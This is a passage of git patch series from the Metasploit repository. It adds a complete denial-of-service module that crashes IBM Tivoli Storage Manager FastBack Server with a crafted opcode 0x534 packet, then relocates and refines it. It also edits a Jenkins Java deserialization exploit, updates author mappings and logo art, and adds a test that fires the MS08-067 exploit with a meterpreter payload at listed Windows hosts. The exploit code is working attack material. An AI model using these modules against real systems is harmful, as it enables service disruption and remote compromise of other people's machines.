insertions(+) create mode 100644 modules/exploits/windows/misc/ibm_tsm_dos.rb diff --git a/modules/exploits/windows/misc/ibm_tsm_dos.rb b/modules/exploits/windows/misc/ibm_tsm_dos.rb new file mode 100644 index 0000000000..9d49daf331 --- /dev/null +++ b/modules/exploits/windows/misc/ibm_tsm_dos.rb @@ -0,0 +1,96 @@ +## +# This module requires Metasploit: http://metasploit.com/download +# Current source: https://github.com/rapid7/metasploit-framework +## + +require 'msf/core' + +class Metasploit4 < Msf::Exploit::Remote + Rank = GoodRanking + + include Msf::Exploit::Remote::Tcp + + def initialize(info={}) + super(update_info(info, + 'Name' => "IBM Tivoli Storage Manager FastBack Server Opcode 0x534 Denial of Service", + 'Description' => %q{ + This module exploits a denial of service condition present in IBM Tivoli Storage Manager FastBack Server + when dealing with packets triggering the opcode 0x534 handler + }, + 'License' => MSF_LICENSE, + 'Author' => + [ + 'Gianni Gnesa', # Public disclosure/Proof of Concept + 'William Webb <william_webb[at]rapid7.com>', # Metasploit + ], + 'References' => + [ + ['URL', 'https://www.exploit-db.com/exploits/38979/'] + ], + 'Payload' => + { + 'BadChars' => "\x00", + }, + 'DefaultOptions' => + { + 'DisablePayloadHandler' => 'true', + }, + 'Platform' => 'win', + 'Targets' => + [ + ['IBM Tivoli Storage Manager FastBack Server 5.5.4.2', {}], + ], + 'Privileged' => false, + 'DisclosureDate' => "Dec 15 2015", + 'DefaultTarget' => 0)) + + register_options( + [ + Opt::RPORT(11460) + ], self.class) + end + + def tv_pkt(opcode, p1="", p2="", p3="") + buf = Rex::Text.rand_text_alpha(0x0C) + buf += [opcode].pack("V") + buf += [0x00].pack("V") + buf += [p1.length].pack("V") + buf += [p1.length].pack("V") + buf += [p2.length].pack("V") + buf += [p1.length + p2.length].pack("V") + buf += [p3.length].pack("V") + + buf += Rex::Text.rand_text_alpha(0x08) + + buf += p1 + buf += p2 + buf += p3 + + pkt = [buf.length].pack("N") + pkt << buf + + return pkt + end + + def exploit + ip = datastore['RHOST'] + port = datastore['RPORT'] + + target_opcode = 0x534 + connect + print_status("Connected to: #{datastore['RHOST'].to_s} port: #{datastore['RPORT']}") + print_status("Sending malicious packet") + + p = tv_pkt(target_opcode, + p1 = "File: %s From: %d To: %d ChunkLoc: %d FileLoc: %d" % [Rex::Text.rand_text_alpha(0x200),0,0,0,0], + p2 = Rex::Text.rand_text_alpha(0x60), + p3 = Rex::Text.rand_text_alpha(0x60) + ) + + sock.put(p) + disconnect + print_status("Packet sent!") + rescue ::Exception => ex + print_status("Exploit failed: #{ex.class}: #{ex.message}") + end +end From e62e1238730d28d1fbdcbd8e6354a3e5ab2951a5 Mon Sep 17 00:00:00 2001 From: wchen-r7 <wei_chen@rapid7.com> Date: Mon, 8 Feb 2016 17:16:54 -0600 Subject: [PATCH 288/686] Update .mailmap for the latest R7 Metasploit employees --- .mailmap | 83 +++++++++++++++++++++++++++++--------------------------- 1 file changed, 43 insertions(+), 40 deletions(-) diff --git a/.mailmap b/.mailmap index 05e09baf26..6c8351c4ef 100644 --- a/.mailmap +++ b/.mailmap @@ -1,45 +1,48 @@ -bcook-r7 <bcook-r7@github> <busterb@gmail.com> -bcook-r7 <bcook-r7@github> Brent Cook <bcook@rapid7.com> -bturner-r7 <bturner-r7@github> Brandon Turner <brandon_turner@rapid7.com> -cdoughty-r7 <cdoughty-r7@github> Chris Doughty <chris_doughty@rapid7.com> -dheiland-r7 <dheiland-r7@github> Deral Heiland <dh@layereddefense.com> -dmaloney-r7 <dmaloney-r7@github> David Maloney <DMaloney@rapid7.com> -dmaloney-r7 <dmaloney-r7@github> David Maloney <David_Maloney@rapid7.com> -dmaloney-r7 <dmaloney-r7@github> dmaloney-r7 <DMaloney@rapid7.com> -dmohanty-r7 <dmohanty-r7@github> Dev Mohanty <Dev_Mohanty@rapid7.com> -dmohanty-r7 <dmohanty-r7@github> Dev Mohanty <Dev_Mohanty@rapid7.com> -dmohanty-r7 <dmohanty-r7@github> dmohanty-r7 <Dev_Mohanty@rapid7.com> -dmohanty-r7 <dmohanty-r7@github> dmohanty-r7 <Dev_Mohanty@rapid7.com> -ecarey-r7 <ecarey-r7@github> Erran Carey <e@ipwnstuff.com> -farias-r7 <farias-r7@github> Fernando Arias <fernando_arias@rapid7.com> -gmikeska-r7 <gmikeska-r7@github> Greg Mikeska <greg_mikeska@rapid7.com> -gmikeska-r7 <gmikeska-r7@github> Gregory Mikeska <greg_mikeska@rapid7.com> -hdm <hdm@github> HD Moore <hd_moore@rapid7.com> -hdm <hdm@github> HD Moore <hdm@digitaloffense.net> -hdm <hdm@github> HD Moore <x@hdm.io> -jhart-r7 <jhart-r7@github> Jon Hart <jon_hart@rapid7.com> -jlee-r7 <jlee-r7@github> <egypt@metasploit.com> # aka egypt -jlee-r7 <jlee-r7@github> <james_lee@rapid7.com> -kgray-r7 <kgray-r7@github> Kyle Gray <kyle_gray@rapid7.com> -lsanchez-r7 <lsanchez-r7@github> Lance Sanchez <lance.sanchez+github@gmail.com> -lsanchez-r7 <lsanchez-r7@github> Lance Sanchez <lance.sanchez@rapid7.com> -lsanchez-r7 <lsanchez-r7@github> Lance Sanchez <lance@AUS-MAC-1041.local> -lsanchez-r7 <lsanchez-r7@github> Lance Sanchez <lance@aus-mac-1041.aus.rapid7.com> -lsanchez-r7 <lsanchez-r7@github> darkbushido <lance.sanchez@gmail.com> -lsato-r7 <lsato-r7@github> Louis Sato <lsato@rapid7.com> +acammack-r7 <acammack-r7@github> Adam Cammack <Adam_Cammack@rapid7.com> +bcook-r7 <bcook-r7@github> <busterb@gmail.com> +bcook-r7 <bcook-r7@github> Brent Cook <bcook@rapid7.com> +bturner-r7 <bturner-r7@github> Brandon Turner <brandon_turner@rapid7.com> +bpatterson-r7 <bpatterson-r7@github> Brian Patterson <Brian_Patterson@rapid7.com> +cdoughty-r7 <cdoughty-r7@github> Chris Doughty <chris_doughty@rapid7.com> +dheiland-r7 <dheiland-r7@github> Deral Heiland <dh@layereddefense.com> +dmaloney-r7 <dmaloney-r7@github> David Maloney <DMaloney@rapid7.com> +dmaloney-r7 <dmaloney-r7@github> David Maloney <David_Maloney@rapid7.com> +dmaloney-r7 <dmaloney-r7@github> dmaloney-r7 <DMaloney@rapid7.com> +dmohanty-r7 <dmohanty-r7@github> Dev Mohanty <Dev_Mohanty@rapid7.com> +dmohanty-r7 <dmohanty-r7@github> Dev Mohanty <Dev_Mohanty@rapid7.com> +dmohanty-r7 <dmohanty-r7@github> dmohanty-r7 <Dev_Mohanty@rapid7.com> +dmohanty-r7 <dmohanty-r7@github> dmohanty-r7 <Dev_Mohanty@rapid7.com> +ecarey-r7 <ecarey-r7@github> Erran Carey <e@ipwnstuff.com> +farias-r7 <farias-r7@github> Fernando Arias <fernando_arias@rapid7.com> +gmikeska-r7 <gmikeska-r7@github> Greg Mikeska <greg_mikeska@rapid7.com> +gmikeska-r7 <gmikeska-r7@github> Gregory Mikeska <greg_mikeska@rapid7.com> +hdm <hdm@github> HD Moore <hd_moore@rapid7.com> +hdm <hdm@github> HD Moore <hdm@digitaloffense.net> +hdm <hdm@github> HD Moore <x@hdm.io> +jhart-r7 <jhart-r7@github> Jon Hart <jon_hart@rapid7.com> +jlee-r7 <jlee-r7@github> <egypt@metasploit.com> # aka egypt +jlee-r7 <jlee-r7@github> <james_lee@rapid7.com> +kgray-r7 <kgray-r7@github> Kyle Gray <kyle_gray@rapid7.com> +lsanchez-r7 <lsanchez-r7@github> Lance Sanchez <lance.sanchez+github@gmail.com> +lsanchez-r7 <lsanchez-r7@github> Lance Sanchez <lance.sanchez@rapid7.com> +lsanchez-r7 <lsanchez-r7@github> Lance Sanchez <lance@AUS-MAC-1041.local> +lsanchez-r7 <lsanchez-r7@github> Lance Sanchez <lance@aus-mac-1041.aus.rapid7.com> +lsanchez-r7 <lsanchez-r7@github> darkbushido <lance.sanchez@gmail.com> +lsato-r7 <lsato-r7@github> Louis Sato <lsato@rapid7.com> pdeardorff-r7 <pdeardorff-r7@github> Paul Deardorff <Paul_Deardorff@rapid7.com> pdeardorff-r7 <pdeardorff-r7@github> pdeardorff-r7 <paul_deardorff@rapid7.com> -sgonzalez-r7 <sgonzalez-r7@github> Sonny Gonzalez <sonny_gonzalez@rapid7.com> -shuckins-r7 <shuckins-r7@github> Samuel Huckins <samuel_huckins@rapid7.com> -todb-r7 <todb-r7@github> Tod Beardsley <tod_beardsley@rapid7.com> -todb-r7 <todb-r7@github> Tod Beardsley <todb@metasploit.com> -todb-r7 <todb-r7@github> Tod Beardsley <todb@packetfu.com> -wchen-r7 <wchen-r7@github> <msfsinn3r@gmail.com> # aka sinn3r -wchen-r7 <wchen-r7@github> <wei_chen@rapid7.com> -wvu-r7 <wvu-r7@github> William Vu <William_Vu@rapid7.com> -wvu-r7 <wvu-r7@github> William Vu <wvu@metasploit.com> -wvu-r7 <wvu-r7@github> William Vu <wvu@nmt.edu> -wvu-r7 <wvu-r7@github> wvu-r7 <William_Vu@rapid7.com> +sgonzalez-r7 <sgonzalez-r7@github> Sonny Gonzalez <sonny_gonzalez@rapid7.com> +shuckins-r7 <shuckins-r7@github> Samuel Huckins <samuel_huckins@rapid7.com> +todb-r7 <todb-r7@github> Tod Beardsley <tod_beardsley@rapid7.com> +todb-r7 <todb-r7@github> Tod Beardsley <todb@metasploit.com> +todb-r7 <todb-r7@github> Tod Beardsley <todb@packetfu.com> +wchen-r7 <wchen-r7@github> <msfsinn3r@gmail.com> # aka sinn3r +wchen-r7 <wchen-r7@github> <wei_chen@rapid7.com> +wvu-r7 <wvu-r7@github> William Vu <William_Vu@rapid7.com> +wvu-r7 <wvu-r7@github> William Vu <wvu@metasploit.com> +wvu-r7 <wvu-r7@github> William Vu <wvu@nmt.edu> +wvu-r7 <wvu-r7@github> wvu-r7 <William_Vu@rapid7.com> +wwebb-r7 <wwebb-r7@github> William Webb <William_Webb@rapid7.com> # Above this line are current Rapid7 employees. Below this paragraph are # volunteers, former employees, and potential Rapid7 employees who, at From d60dcf72f9d9a7f891eae83f2a2cf01f46182d7e Mon Sep 17 00:00:00 2001 From: wchen-r7 <wei_chen@rapid7.com> Date: Mon, 8 Feb 2016 18:16:48 -0600 Subject: [PATCH 289/686] Resolve #6546, support manual config for X-Jenkins-CLI-Port Resolve #6546 --- .../exploits/linux/misc/jenkins_java_deserialize.rb | 12 ++++++++++-- 1 file changed, 10 insertions(+), 2 deletions(-) diff --git a/modules/exploits/linux/misc/jenkins_java_deserialize.rb b/modules/exploits/linux/misc/jenkins_java_deserialize.rb index c7eec77106..728dc431f7 100644 --- a/modules/exploits/linux/misc/jenkins_java_deserialize.rb +++ b/modules/exploits/linux/misc/jenkins_java_deserialize.rb @@ -52,10 +52,18 @@ class Metasploit3 < Msf::Exploit::Remote OptString.new('TEMP', [true, 'Folder to write the payload to', '/tmp']), Opt::RPORT('8080') ], self.class) + + register_advanced_options([ + OptPort.new('XJenkinsCliPort', [ false, 'The X-Jenkins-CLI port. If this is set, the TARGETURI option is ignored.']) + ], self.class) + end + + def cli_port + @jenkins_cli_port || datastore['XJenkinsCliPort'] end def exploit - unless vulnerable? + unless cli_port || vulnerable? fail_with(Failure::Unknown, "#{peer} - Jenkins is not vulnerable, aborting...") end invoke_remote_method(set_payload) @@ -155,7 +163,7 @@ class Metasploit3 < Msf::Exploit::Remote def invoke_remote_method(serialized_java_stream) begin - socket = connect(true, {'RPORT' => @jenkins_cli_port}) + socket = connect(true, {'RPORT' => cli_port}) print_status 'Sending headers...' socket.put(read_bin_file('serialized_jenkins_header')) From 1d6b782cc8d7c1c29ff4cc0dfaa09c90254ad693 Mon Sep 17 00:00:00 2001 From: wchen-r7 <wei_chen@rapid7.com> Date: Mon, 8 Feb 2016 18:40:48 -0600 Subject: [PATCH 290/686] Change logic I just can't deal with this "unless" syntax... --- modules/exploits/linux/misc/jenkins_java_deserialize.rb | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/modules/exploits/linux/misc/jenkins_java_deserialize.rb b/modules/exploits/linux/misc/jenkins_java_deserialize.rb index 728dc431f7..22ac86212d 100644 --- a/modules/exploits/linux/misc/jenkins_java_deserialize.rb +++ b/modules/exploits/linux/misc/jenkins_java_deserialize.rb @@ -63,7 +63,7 @@ class Metasploit3 < Msf::Exploit::Remote end def exploit - unless cli_port || vulnerable? + if cli_port == 0 && !vulnerable? fail_with(Failure::Unknown, "#{peer} - Jenkins is not vulnerable, aborting...") end invoke_remote_method(set_payload) From eadbb6b58232c5c49c66288826a218f5cb92100e Mon Sep 17 00:00:00 2001 From: William Webb <william_webb@rapid7.com> Date: Tue, 9 Feb 2016 11:44:01 -0600 Subject: [PATCH 291/686] moved module to modules/auxiliary/dos/misc --- .../windows => auxiliary/dos}/misc/ibm_tsm_dos.rb | 10 ++++++---- 1 file changed, 6 insertions(+), 4 deletions(-) rename modules/{exploits/windows => auxiliary/dos}/misc/ibm_tsm_dos.rb (87%) diff --git a/modules/exploits/windows/misc/ibm_tsm_dos.rb b/modules/auxiliary/dos/misc/ibm_tsm_dos.rb similarity index 87% rename from modules/exploits/windows/misc/ibm_tsm_dos.rb rename to modules/auxiliary/dos/misc/ibm_tsm_dos.rb index 9d49daf331..57fbd58292 100644 --- a/modules/exploits/windows/misc/ibm_tsm_dos.rb +++ b/modules/auxiliary/dos/misc/ibm_tsm_dos.rb @@ -20,7 +20,7 @@ class Metasploit4 < Msf::Exploit::Remote 'License' => MSF_LICENSE, 'Author' => [ - 'Gianni Gnesa', # Public disclosure/Proof of Concept + 'Gianni Gnesa', # Public disclosure/Proof of Concept 'William Webb <william_webb[at]rapid7.com>', # Metasploit ], 'References' => @@ -88,9 +88,11 @@ class Metasploit4 < Msf::Exploit::Remote ) sock.put(p) - disconnect print_status("Packet sent!") - rescue ::Exception => ex - print_status("Exploit failed: #{ex.class}: #{ex.message}") + rescue Rex::AddressInUse, ::Errno::ETIMEDOUT, Rex::HostUnreachable, Rex::ConnectionTimeout, Rex::ConnectionRefused, ::Timeout::Error, ::EOFError => ex + print_status("Exploit failed: #{ex.class} #{ex.message}") + elog("#{ex.class} #{ex.message}\n#{ex.backtrace * "\n"}") + ensure + disconnect end end From b3e8bd1dab7f49267e61dcd4df5855598a771e3b Mon Sep 17 00:00:00 2001 From: Bigendian Smalls <mainframe@bigendiansmalls.com> Date: Tue, 9 Feb 2016 12:01:25 -0600 Subject: [PATCH 292/686] Updated zsploit screens to use std msf colors Using Rex::Ui::Text::Colors now instead of ansi codes Thanks to @mainframed for the quick turnaround --- data/logos/zsploit-1.txt | 22 ++++++++++---------- data/logos/zsploit-2.txt | 41 +++++++++++++++++++------------------- data/logos/zsploit-3.txt | 43 ++++++++++++++++++++-------------------- 3 files changed, 52 insertions(+), 54 deletions(-) diff --git a/data/logos/zsploit-1.txt b/data/logos/zsploit-1.txt index 98cd8006bf..95d6f8cd24 100644 --- a/data/logos/zsploit-1.txt +++ b/data/logos/zsploit-1.txt @@ -1,11 +1,11 @@ -____________ - [%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%| $a,|%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%] - [%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%| $S`?a,|%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%] - [%%%%%%%%%%%%%%%%%%%%__%%%%%%%%%%|`?a, |%%%%%%%%__%%%%%%%%%__%%__ %%%%] - [% .--------..-----.| |_ .---.-.|.,a$%|.-----.| |.-----.|__|| |_ %%] - [% ||| -__|| _|| _ || ,,aS$""` || _ || || _ || || _|%%] - [% |__|__|__||_____||____||___._||%$P"`|| __||__||_____||__||____|%%] - [%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%| `"a,||__|%%%%%%%%%%%%%%%%%%%%%%%%%%] - [%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%|____`"a,$$__|%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%] - [%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%`"$ %%%%%%%%%%%%%%%%%%%%%%%%%%%%%%] - [%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%] +%bld%blk ____________%whi + [%%%%%clr%%%%%%%%%bld%blk%%%%%%%%blk%%%%%%%%%%%%%| %red$a,%blk |%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%whi] + [%%%%clr%%%%%%%%%%bld%blk%%%%%%%%%%%%%%%%%%%%| %red$S`?a,%blk |%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%whi] + [%%%clr%%%%%%%%bld%blk%%%%%%%%%%%%whi_%cya_%blk%%%%%%%%%%| %red`?a,%blk |%%%%%%%%%whi_%grn_%blk%%%%%%%%%%whi_%grn_%blk%%%whi_%grn_ %blk%%%%%whi] + [% .-%cya--%clr%cya-----.%bld%whi.-%cya-%clr%cya---.%bld%whi| %clr%cya|_ %bld%whi.-%cya-%clr%cya-.-.%bld%blk| %red.,a$%%blk|%whi.-%grn---%clr%grn-.%bld%whi| %clr%grn|%bld%whi.-%grn--%clr%grn--.%bld%whi|%grn_%clr%grn_|%bld%whi| %clr%grn|_ %bld%blk%%%whi] + [% | %clr%cya|%bld%whi| %clr%cya-__|%clr%cya| %clr%cya_|%bld%whi| %clr%cya_ |%bld%blk| %red,,aS$""`%blk |%whi| %clr%grn_ |%bld%grn| %clr%grn|%bld%whi| %clr%grn_ |%bld%grn| %clr%grn|%bld%grn| %clr%grn_|%bld%blk%%%whi] + [% %cya|%clr%cya__|__|__|%bld%cya|_%clr%cya____|%bld%cya|_%clr%cya___|%bld%cya|_%clr%cya__._|%bld%blk|%red%$P"`%blk |%grn| %clr%grn__|%bld%grn|_%clr%grn_|%bld%grn|_%clr%grn____|%bld%grn|_%clr%grn_|%bld%grn|_%clr%grn___|%bld%blk%%%bld%whi] + [%%clr%%%%bld%blk%%%%%%%%%%%%%%%%%%%%%%%%%%%%| %red`"a,%blk |%clr%grn|__|%bld%blk%%%%%%%%%%%%%%%%%%%%%%%%%%%whi] + [%%clr%%%bld%blk%%%%%%%%%%%%%%%%%%%%%%%%%%%%%|____%red`"a,$$%blk__|%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%whi] + [%clr%%%bld%blk%%%%%%%%%%%%%%%%%%%%%%%%%%%%%% %red`"$%blk %%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%whi] + [%clr%%bld%blk%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%whi] diff --git a/data/logos/zsploit-2.txt b/data/logos/zsploit-2.txt index c95f49cbe9..48c6631edd 100644 --- a/data/logos/zsploit-2.txt +++ b/data/logos/zsploit-2.txt @@ -1,21 +1,20 @@ - - -.. - . - -dBBBBBBb dBBBP dBBBBBBP dBBBBBb .o -' dB'BBP - dB'dB'dB' dBBPdBPdBP BB - dB'dB'dB' dBPdBPdBP BB - dB'dB'dB' dBBBBP dBPdBBBBBBB - -dBBBBBP dBBBBBb dBP dBBBBP dBP dBBBBBBP -..dB' dBP dB'.BP -|dBP dBBBB' dBP dB'.BP dBP dBP ---o-- dBP dBP dBP dB'.BP dBP dBP -|dBBBBP dBP dBBBBP dBBBBP dBP dBP - -. -. -oTo boldly shell were no -shell has gone before +%bld%whi + . . + . + + %bludBBBBBBb dBBBP dBBBBBBP dBBBBBb %whi. o + %blu ' dB' BBP + dB'dB'dB' dBBP dBP dBP BB + dB'dB'dB' dBP dBP dBP BB + dB'dB'dB' dBBBBP dBP dBBBBBBB + + %reddBBBBBP %bludBBBBBb dBP dBBBBP dBP dBBBBBBP + %whi. %cya. %bludB' dBP dB'.BP + %cya| %reddBP%blu dBBBB' dBP dB'.BP dBP dBP + %cya--o-- %reddBP%blu dBP dBP dB'.BP dBP dBP + %cya| %reddBBBBP%blu dBP dBBBBP dBBBBP dBP dBP%whi + + . + . + o %grnTo boldly go where no + shell has gone before diff --git a/data/logos/zsploit-3.txt b/data/logos/zsploit-3.txt index 35fd821a29..3a2c01931a 100644 --- a/data/logos/zsploit-3.txt +++ b/data/logos/zsploit-3.txt @@ -1,22 +1,21 @@ - -.,,.. -.\$$$$$L..,,==aaccaacc%#s$b.d8, d8P -d8P#$$$$$$$$$$$$$$$$$$$$$$$$$$$b. `BP d888888p -d888888P'7$$$$\""""''^^`` .7$$$|D*"'```?88' - d8bd8b.d8p d8888b ?88' d888b8b_.os#$|8*"` d8P?8b 88P - 88P`?P'?P d8b_,dP 88P d8P' ?88.oaS###S*"`d8P d8888b ?88b 88b - d88 d8 ?8 88b88b 88b ,88b .osS$$$$*" ?88,.d88b, d88 d8P' ?88 88P `?8b -d88' d88b 8b`?8888P'`?8b`?88P'.aS$$$$Q*"` `?88' ?88 ?88 88b d88 d88 -.a#$$$$$$"`88b d8P 88b`?8888P' -,s$$$$$$$"`888888P' 88n_.,,,ass;: -.a$$$$$$$P`d88P' .,.ass%#S$$$$$$$$$$$$$$' -.a$###$$$P`_.,,-aqsc#SS$$$$$$$$$$$$$$$$$$$$$$$$$$' -,a$$###$$P` _.,-ass#S$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$####SSSS' -.a$$$$$$$$$$SSS$$$$$$$$$$$$$$$$$$$$$$$$$$$$SS##==--""''^^/$$$$$$' -_______________________________________________________________ ,&$$$$$$'_____, - ll&&$$$$' -.;;lll&&&&' -...;;lllll&' -......;;;llll;;;.... -` ......;;;;... . . -` `` ` +%clr%bld%red + .,,. . + .\$$$$$L..,,==aaccaacc%#s$b. %whid%grn8, %whid8%grnP + %whid8%cyaP %red#$$$$$$$$$$$$$$$$$$$$$$$$$$$b. %whi`BP d88%grn8888p + %whid%cya888888P %red'7$$$$\""""''^^`` .7$$$|D*"'``` %whi?%grn88' + %whid8%cyabd8b.d8p %whid8%cya888b %whi?%cya88' %whid88%cya8b8b%red _.os#$|8*"` %whid8%grnP %whi?8%grnb 88P + %whi8%cya8P`?P'?P %whid8%cyab_,dP 88P %whid8%cyaP' ?88%red .oaS###S*"` %whid8%grnP %whid88%grn88b $whi?%grn88b 88b + %cyad88 d8 ?8 88b %whi8%cya8b 88b ,88b %red.osS$$$$*" %grn?88,.d88b, %whid%grn88 %whid%grn8P' ?88 88P `?8b +%cyad88' d88b 8b`?8888P'`?8b`?88P'%red.aS$$$$Q*"` %grn`?88' ?88 ?88 88b d88 d88%red + .a#$$$$$$"` %grn88b d8P 88b`?8888P'%red + ,s$$$$$$$"` %grn888888P' 88n%red _.,,,ass;: + .a$$$$$$$P` %grnd88P'%red .,.ass%#S$$$$$$$$$$$$$$' + .a$###$$$P` _.,,-aqsc#SS$$$$$$$$$$$$$$$$$$$$$$$$$$' + ,a$$###$$P` _.,-ass#S$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$####SSSS' + .a$$$$$$$$$$SSS$$$$$$$$$$$$$$$$$$$$$$$$$$$$SS##==--""''^^/$$$$$$' +%whi___________%clr_____________________________%bld%blk_______________________%red ,&$$$$$$'%blk_____%red + ll&&$$$$' + .;;lll&&&&' + ...;;lllll&' + ......;;;llll;;;.... + ` ......;;;;... . . From d8a7421a0a9fdfaae96fe9f5e1e477ec3d80039f Mon Sep 17 00:00:00 2001 From: darkbushido <lance.sanchez@gmail.com> Date: Wed, 30 Dec 2015 14:57:41 -0600 Subject: [PATCH 293/686] working on automated testing of 08-067 --- config/cucumber.yml | 3 +- .../exploit/smb/ms08_067_netapi.feature | 189 ++---------------- features/support/targets.yml.example | 9 +- lib/tasks/custom_cucumber.rake | 6 + 4 files changed, 32 insertions(+), 175 deletions(-) diff --git a/config/cucumber.yml b/config/cucumber.yml index e3de143513..8cfb5f1a74 100644 --- a/config/cucumber.yml +++ b/config/cucumber.yml @@ -6,5 +6,6 @@ ignored_tags = "--tags ~@boot --tags ~@targets" %> default: <%= std_opts %> <%= ignored_tags %> features boot: <%= std_opts %> --tags @boot features +exploit: <%= std_opts %> --tags @targets features wip: --tags @wip:3 --wip features -rerun: <%= rerun_opts %> --format rerun --out rerun.txt --strict --tags ~@wip +rerun: <%= rerun_opts %> --format rerun --out rerun.txt --strict --tags ~@wip \ No newline at end of file diff --git a/features/modules/exploit/smb/ms08_067_netapi.feature b/features/modules/exploit/smb/ms08_067_netapi.feature index e23730be1c..9a9cf04ddf 100644 --- a/features/modules/exploit/smb/ms08_067_netapi.feature +++ b/features/modules/exploit/smb/ms08_067_netapi.feature @@ -1,181 +1,26 @@ -@wip +@targets Feature: MS08-067 netapi Background: Given a directory named "home" And I cd to "home" And a mocked home directory - Given I run `msfconsole` interactively - And I wait for stdout to contain "Free Metasploit Pro trial: http://r-7.co/trymsp" - Scenario: The MS08-067 Module should have the following options - When I type "use exploit/windows/smb/ms08_067_netapi" - And I type "show options" - And I type "exit" - Then the output should contain: + Scenario: The MS08-067 should get a session with bind_tcp + Given I ready the windows targets + And a file named "ms08-067.rc" with: """ - Module options (exploit/windows/smb/ms08_067_netapi): - - Name Current Setting Required Description - ---- --------------- -------- ----------- - RHOST yes The target address - RPORT 445 yes Set the SMB service port - SMBPIPE BROWSER yes The pipe name to use (BROWSER, SRVSVC) - - - Exploit target: - - Id Name - -- ---- - 0 Automatic Targeting - + <ruby> + hosts = YAML.load File.open Rails.root.join('features', 'support', 'targets.yml') + self.run_single('use exploit/windows/smb/ms08_067_netapi') + self.run_single('set payload windows/meterpreter/bind_tcp') + hosts['windows'].each do |host| + self.run_single("set RHOST #{host['ip']}") + self.run_single('run') + sleep 1 + end + + </ruby> """ - - Scenario: The MS08-067 Module should have the following advanced options - When I type "use exploit/windows/smb/ms08_067_netapi" - And I type "show advanced" - And I type "exit" - Then the output should contain: - """ - Module advanced options: - - Name : CHOST - Current Setting: - Description : The local client address - - Name : CPORT - Current Setting: - Description : The local client port - - Name : ConnectTimeout - Current Setting: 10 - Description : Maximum number of seconds to establish a TCP connection - - Name : ContextInformationFile - Current Setting: - Description : The information file that contains context information - - Name : DCERPC::ReadTimeout - Current Setting: 10 - Description : The number of seconds to wait for DCERPC responses - - Name : DisablePayloadHandler - Current Setting: false - Description : Disable the handler code for the selected payload - - Name : EnableContextEncoding - Current Setting: false - Description : Use transient context when encoding payloads - - Name : NTLM::SendLM - Current Setting: true - Description : Always send the LANMAN response (except when NTLMv2_session is - specified) - - Name : NTLM::SendNTLM - Current Setting: true - Description : Activate the 'Negotiate NTLM key' flag, indicating the use of - NTLM responses - - Name : NTLM::SendSPN - Current Setting: true - Description : Send an avp of type SPN in the ntlmv2 client Blob, this allow - authentification on windows Seven/2008r2 when SPN is required - - Name : NTLM::UseLMKey - Current Setting: false - Description : Activate the 'Negotiate Lan Manager Key' flag, using the LM key - when the LM response is sent - - Name : NTLM::UseNTLM2_session - Current Setting: true - Description : Activate the 'Negotiate NTLM2 key' flag, forcing the use of a - NTLMv2_session - - Name : NTLM::UseNTLMv2 - Current Setting: true - Description : Use NTLMv2 instead of NTLM2_session when 'Negotiate NTLM2' key - is true - - Name : Proxies - Current Setting: - Description : A proxy chain of format type:host:port[,type:host:port][...] - - Name : SMB::ChunkSize - Current Setting: 500 - Description : The chunk size for SMB segments, bigger values will increase - speed but break NT 4.0 and SMB signing - - Name : SMB::Native_LM - Current Setting: Windows 2000 5.0 - Description : The Native LM to send during authentication - - Name : SMB::Native_OS - Current Setting: Windows 2000 2195 - Description : The Native OS to send during authentication - - Name : SMB::VerifySignature - Current Setting: false - Description : Enforces client-side verification of server response signatures - - Name : SMBDirect - Current Setting: true - Description : The target port is a raw SMB service (not NetBIOS) - - Name : SMBDomain - Current Setting: . - Description : The Windows domain to use for authentication - - Name : SMBName - Current Setting: *SMBSERVER - Description : The NetBIOS hostname (required for port 139 connections) - - Name : SMBPass - Current Setting: - Description : The password for the specified username - - Name : SMBUser - Current Setting: - Description : The username to authenticate as - - Name : SSL - Current Setting: false - Description : Negotiate SSL for outgoing connections - - Name : SSLCipher - Current Setting: - Description : String for SSL cipher - "DHE-RSA-AES256-SHA" or "ADH" - - Name : SSLVerifyMode - Current Setting: PEER - Description : SSL verification method (Accepted: CLIENT_ONCE, - FAIL_IF_NO_PEER_CERT, NONE, PEER) - - Name : SSLVersion - Current Setting: SSL3 - Description : Specify the version of SSL that should be used (Accepted: SSL2, - SSL3, TLS1) - - Name : VERBOSE - Current Setting: false - Description : Enable detailed status messages - - Name : WORKSPACE - Current Setting: - Description : Specify the workspace for this module - - Name : WfsDelay - Current Setting: 0 - Description : Additional delay when waiting for a session - """ - - @targets - Scenario: Show RHOST/etc variable expansion from a config file - When I type "use exploit/windows/smb/ms08_067_netapi" - When RHOST is WINDOWS - And I type "set PAYLOAD windows/meterpreter/bind_tcp" - And I type "show options" - And I type "run" - And I type "exit" - And I type "exit" - Then the output should match /spider-wxp/ + When I run `msfconsole --environment test -q -r ms08-067.rc -x exit` + Then the output should contain "[*] Exploit completed, 1 session was created." diff --git a/features/support/targets.yml.example b/features/support/targets.yml.example index 75f4b9915d..0752a6cc7e 100644 --- a/features/support/targets.yml.example +++ b/features/support/targets.yml.example @@ -1,2 +1,7 @@ -WINDOWS: spider-wxp.vuln.lax.rapid7.com -LINUX: spider-ubuntu.vuln.lax.rapid7.com +windows: + - + hostname: wxpsp0 + ip: 127.0.0.100 + - + hostname: wxpsp2 + ip: 127.0.0.101 diff --git a/lib/tasks/custom_cucumber.rake b/lib/tasks/custom_cucumber.rake index 3dab9d0697..9b8c3fb8ae 100644 --- a/lib/tasks/custom_cucumber.rake +++ b/lib/tasks/custom_cucumber.rake @@ -12,6 +12,12 @@ begin t.fork = true # You may get faster startup if you set this to false t.profile = 